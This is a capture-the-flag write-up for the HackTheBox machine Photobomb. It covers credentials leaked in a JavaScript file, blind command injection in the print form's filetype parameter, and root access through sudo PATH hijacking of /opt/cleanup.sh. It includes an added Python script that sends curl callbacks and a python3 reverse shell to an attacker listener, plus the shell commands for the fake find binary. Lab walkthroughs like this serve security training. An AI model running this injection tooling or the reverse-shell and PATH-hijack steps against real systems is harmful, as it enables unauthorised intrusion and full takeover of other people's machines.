Hackthebox Photobomb Writeup


Dedsec / October 10, 2022

Hackthebox released a new machine called Photobomb. The web server serves a JavaScript file that leaks the username and password for the protected /printer route. Behind that route, the filetype parameter of the print form is vulnerable to command injection, which gives us a reverse shell as the wizard user. For privilege escalation, a sudo rule with the SETENV tag lets us run /opt/cleanup.sh as root with a PATH of our choosing, and the script calls find without an absolute path, so a fake find placed earlier in PATH gets us a root shell (PATH hijacking, not path traversal).


❯ nmap -sC -sV -oA nmap/result
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-10 15:17 IST
Nmap scan report for
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.68 seconds

Nmap tells us there are two open ports, 22 (SSH) and 80 (HTTP), and that the HTTP port redirects to http://photobomb.htb/, a hostname we cannot resolve yet.

Let's quickly add the target's IP address and that hostname to our /etc/hosts file:

❯ cat /etc/hosts
        localhost examzy.com broadcasthost
::1             localhost
        photobomb.htb


There is a simple HTML page with a link to /printer, but that route prompts for a username and password that we don't know.



So I viewed the source code of the page, which includes a JS file called photobomb.js.


Viewing that file, we get a username and password hard-coded in it.


Now let's try to log in with that username and password:

username = pH0t0
password = b0Mb!

After logging in, we see a form that lets us download a photo to print. It sends three parameters: photo, filetype and dimensions.


I captured that request in Burp and tried command injection in every parameter, because I didn't know which one (if any) would be vulnerable.

The injection is blind: the response never shows command output. So the payload asks the target to fetch a URL from my machine, and if the request shows up in my web server's log, the injected command ran.

But before that, start your Python web server:

> python3 -m http.server 80


No request arrives for the photo and dimensions parameters, which confirms they are not vulnerable.


Command Injection

Let's try the filetype parameter.



And we got the hit in the web server log: the injected command ran on the target, which means we can get a reverse shell the same way.



I tried a bash reverse-shell payload, but that didn't work, so let's try a Python one.


Before that, start your netcat listener:

> nc -nvlp 9001

The request hangs, which is a good sign: the server is stuck waiting for our injected command to finish. Let's check netcat.
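The probing procedure above, written out as an added Python example that is not part of the original writeup: one request per parameter, each carrying a callback to our own web server tagged with the parameter's name, then a python3 reverse shell through the parameter that called back. The baseline form values, the `;` separator, the presence of curl on the target and the listener address 10.10.14.2 are assumptions; the credentials, the three parameter names and the ports 80 and 9001 come from the page.

```python
#!/usr/bin/env python3
"""Added example, not code from the original writeup.
Probes each /printer form parameter for blind command injection with an
out-of-band HTTP callback, then sends a Python reverse shell through the
parameter that called back."""
import base64
import sys
import urllib.parse
import urllib.request

USERNAME, PASSWORD = "pH0t0", "b0Mb!"           # credentials from photobomb.js
PARAMS = ("photo", "filetype", "dimensions")    # the three POST fields seen in Burp
HTTP_PORT, SHELL_PORT = 80, 9001                # python3 -m http.server 80 / nc -nvlp 9001

# Assumption: any photo name and size the form offers work as baseline values.
BASELINE = {"photo": "example.jpg", "filetype": "jpg", "dimensions": "3000x2000"}


def basic_auth_header(user, password):
    """Authorization header for the password-protected /printer route."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token


def inject(baseline, target, payload, sep=";"):
    """Copy of the form with `payload` appended to one parameter only.
    The ';' separator is an assumption about how the server builds its shell
    command: it ends the legitimate command and starts ours."""
    form = dict(baseline)
    form[target] = f"{form[target]}{sep}{payload}"
    return form


def oob_probe(lhost, tag):
    """Fetch /<tag> from our web server (assumes curl exists on the target).
    The request line in the http.server log names the parameter that ran it."""
    return f"curl http://{lhost}:{HTTP_PORT}/{tag}"


def python_revshell(lhost, lport):
    """python3 reverse shell one-liner; python3 is present on the box."""
    return (
        "python3 -c 'import socket,subprocess,os;"
        f"s=socket.socket();s.connect((\"{lhost}\",{lport}));"
        "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
        "subprocess.call([\"/bin/sh\",\"-i\"])'"
    )


def encode_form(form):
    """x-www-form-urlencoded body; ';', quotes and spaces are percent-encoded,
    so the payload survives transport and is decoded before the shell sees it."""
    return urllib.parse.urlencode(form)


def probe_forms(lhost):
    """One form per parameter, each payload tagged with that parameter's name."""
    return [(p, inject(BASELINE, p, oob_probe(lhost, p))) for p in PARAMS]


def post(url, form, timeout=10):
    req = urllib.request.Request(url, data=encode_form(form).encode(), method="POST")
    req.add_header("Authorization", basic_auth_header(USERNAME, PASSWORD))
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    # probe:  ./probe.py http://photobomb.htb/printer 10.10.14.2
    # shell:  ./probe.py http://photobomb.htb/printer 10.10.14.2 filetype
    url, lhost = sys.argv[1], sys.argv[2]
    if len(sys.argv) == 3:
        for param, form in probe_forms(lhost):
            try:
                print(param, post(url, form))
            except Exception as exc:        # a timeout or 500 is fine; the http.server log decides
                print(param, "error:", exc)
    else:
        # The request blocks while the shell is alive: that hang is the good sign.
        post(url, inject(BASELINE, sys.argv[3], python_revshell(lhost, SHELL_PORT)), timeout=None)
```

Run the probe first with the web server listening on port 80 and look at which tag appears in its log; then run the shell mode against that parameter with netcat listening on 9001. Tagging each callback with the parameter name is what turns "something ran" into "filetype ran it" without guessing.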


Boom 🎉 we got a shell as the wizard user.


Got the user.txt:

wizard@photobomb:~/photobomb$ cd ~
wizard@photobomb:~$ cat user.txt

Privilege Escalation

Before running linpeas, let's try sudo -l first.

It shows a script, /opt/cleanup.sh, that we can run as root without a password. The SETENV tag matters too: it allows us to set environment variables, PATH included, on the sudo command line.

wizard@photobomb:~$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

The content of the script is straightforward: it copies the log file into photobomb.log.old, truncates photobomb.log to 0 bytes, and then chowns the original images to root.

But look closely: cat and truncate are called with absolute paths, while find is not, so it is resolved through PATH. Since SETENV lets us control PATH, we can put our own find earlier in the search order and root will execute it. (cd is unqualified as well, but it is a bash builtin, so the shell never looks it up in PATH.)

wizard@photobomb:~$ cat /opt/cleanup.sh
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

Just create a file named find in /tmp that runs /bin/bash and make it executable; without the execute bit, PATH lookup skips it.

I also created a cd file as a backup, but since cd is a builtin it is never executed, so only the find shim actually matters.

Now run the script with sudo, prepending /tmp to PATH:

wizard@photobomb:~$ echo "/bin/bash" > /tmp/cd
wizard@photobomb:~$ echo "/bin/bash" > /tmp/find
wizard@photobomb:~$ chmod +x /tmp/cd /tmp/find
wizard@photobomb:~$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:/home/wizard/photobomb# cat /root/root.txt

